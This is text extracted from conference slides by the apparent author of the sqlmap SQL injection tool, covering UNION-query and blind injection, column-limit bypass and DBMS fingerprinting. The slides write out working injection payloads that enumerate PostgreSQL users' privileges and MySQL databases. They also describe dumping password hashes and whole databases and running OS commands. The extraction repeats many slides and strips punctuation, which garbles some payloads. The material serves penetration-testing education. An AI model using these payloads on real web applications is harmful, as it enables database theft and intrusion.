Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
